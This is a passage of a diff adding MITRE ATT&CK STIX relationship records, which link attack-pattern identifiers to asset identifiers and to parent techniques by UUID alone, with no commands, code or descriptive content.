"2024-06-27T09:06:03.246Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dc306940-9d92-4474-9fa6-4d667eff64f5", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dc42877b-777e-4088-939b-a3761b4339f6", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cabe189c-a0e3-4965-a473-dcff00f17213", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dc5a3635-08a0-4321-9d26-930fbe2a3fb5", + "created": "2020-01-24T14:54:42.876Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec", + "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dc6937cc-8464-49e8-987c-1e674f051583", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dc724053-6ac6-43c6-b24a-3e1234a973de", + "created": "2023-03-14T18:10:05.838Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-14T18:10:05.838Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--55bb4471-ff1f-43b4-88c1-c9384ec47abf", + "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dc76a2fd-8cbd-4305-b84b-4bf1811b688d", + "created": "2024-06-21T14:12:20.267Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.267Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--34a80bc4-80f2-46e6-94ff-f3265a4b657c", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dc8ae1a5-aa85-4388-b175-f05bbf5f0082", + "created": "2024-03-21T21:10:57.942Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-03-21T21:10:57.942Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--e8a0a025-3601-4755-abfb-8d08283329fb", + "target_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dc9874be-ce60-4160-b48b-e35be4537e91", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4a5b7ade-8bb5-4853-84ed-23f262002665", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dc9e039c-8297-443f-be2e-19a5475022f0", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0533ab23-3f7d-463f-9bd8-634d27e4dee1", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dca5cde1-ebf3-4cb8-ab80-1a5ab13000fa", + "created": "2020-02-05T14:17:47.193Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dcb17425-2f1a-4630-b870-117406b1694a", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dcb884ce-bbe0-48ac-949d-2569bc54742a", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7decb26c-715c-40cf-b7e0-026f7d7cc215", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dce67ade-d7d8-4810-aa96-a6b7b6b2b5ca", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dcfb1471-c563-44c5-aaf9-9e1f239efd79", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dd434e57-9813-4e3f-ac86-f9ddc6313704", + "created": "2020-03-13T20:33:00.338Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5", + "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dd8324d6-6251-440c-8c0c-62875d955920", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0f20e3cb-245b-4a61-8a91-2d93f7cb0e9b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dd9abe36-1cee-4100-a94f-105d9678fd1f", + "created": "2023-09-29T18:06:35.470Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:06:35.470Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dd9eb455-7c2a-4e8c-914e-35edca08bbc5", + "created": "2024-06-21T14:12:20.273Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.273Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dda439ef-f5a1-4973-83f6-20e06e794d67", + "created": "2024-06-21T14:12:20.274Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ba04e672-da86-4e69-aa15-0eca5db25f43", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ddb19733-cfbb-4cb5-880b-787bfc2805a5", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7d77a07d-02fe-4e88-8bd9-e9c008c01bf0", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ddc5f723-da25-42b0-b281-4cc20d3e8da1", + "created": "2023-09-27T19:49:41.528Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-27T19:49:41.528Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--34a80bc4-80f2-46e6-94ff-f3265a4b657c", + "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--ddff2aa4-975a-4a89-9c1d-b0a4b3a07b63", + "created": "2020-09-17T12:51:40.982Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--c898c4b5-bf36-4e6e-a4ad-5b8c4c13e35b", + "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--de0fc47d-9ebe-437b-833a-ff7116709c37", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--de195a33-8461-4d6a-aa6a-cb2893904c66", + "created": "2020-02-14T13:09:51.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc", + "target_ref": "attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--de2d023c-d1cf-4819-9d9c-67a772b0e313", + "created": "2020-01-13T15:58:18.813Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634", + "target_ref": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--de426671-4eb7-4ac0-b8b4-9ce07fdda87d", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--de56c26f-ea38-4e6e-a933-fdf4cd1932dd", + "created": "2020-03-24T14:09:11.791Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--428ca9f8-0e33-442a-be87-f869cb4cf73e", + "target_ref": "attack-pattern--b8902400-e6c5-4ba2-95aa-2d35b442b118", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--de5a2a12-daff-46b3-b532-3fd47fa636a0", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6d4a7fb3-5a24-42be-ae61-6728a2b581f6", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--de73c6a8-fd33-469d-b7e4-e4f6edd823b9", + "created": "2020-10-12T17:50:31.765Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21", + "target_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--de7fc8e7-dd89-4816-b67e-ac0a641e84b8", + "created": "2024-06-26T19:29:12.182Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T19:29:12.182Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--51a14c76-dd3b-440b-9c20-2bf91d25a814", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--de8373c2-8fb3-40e7-84f4-b90bc2ae4ff5", + "created": "2024-06-26T13:54:03.244Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:54:03.244Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--38eb0c22-6caf-46ce-8869-5964bd735858", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--de83d184-aa21-4074-9f44-5261b2c9142d", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--de8f5b54-cf59-4753-bfb6-15cdf7d28f5d", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--de99dcb2-a611-452d-90da-4c0392a5a1c4", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--43881e51-ac74-445b-b4c6-f9f9e9bf23fe", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dea29057-c568-4dbb-b0ad-9f8b2741bc8a", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--dead5325-7efe-4dcc-bf78-42b9190f74da", + "created": "2023-09-29T16:46:40.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:46:40.272Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--deb1409b-7eca-4075-9000-62e0ad220ceb", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--deb1b666-8231-490c-88ea-198325d25310", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7de1f7ac-5d0c-4c9c-8873-627202205331", + "target_ref": 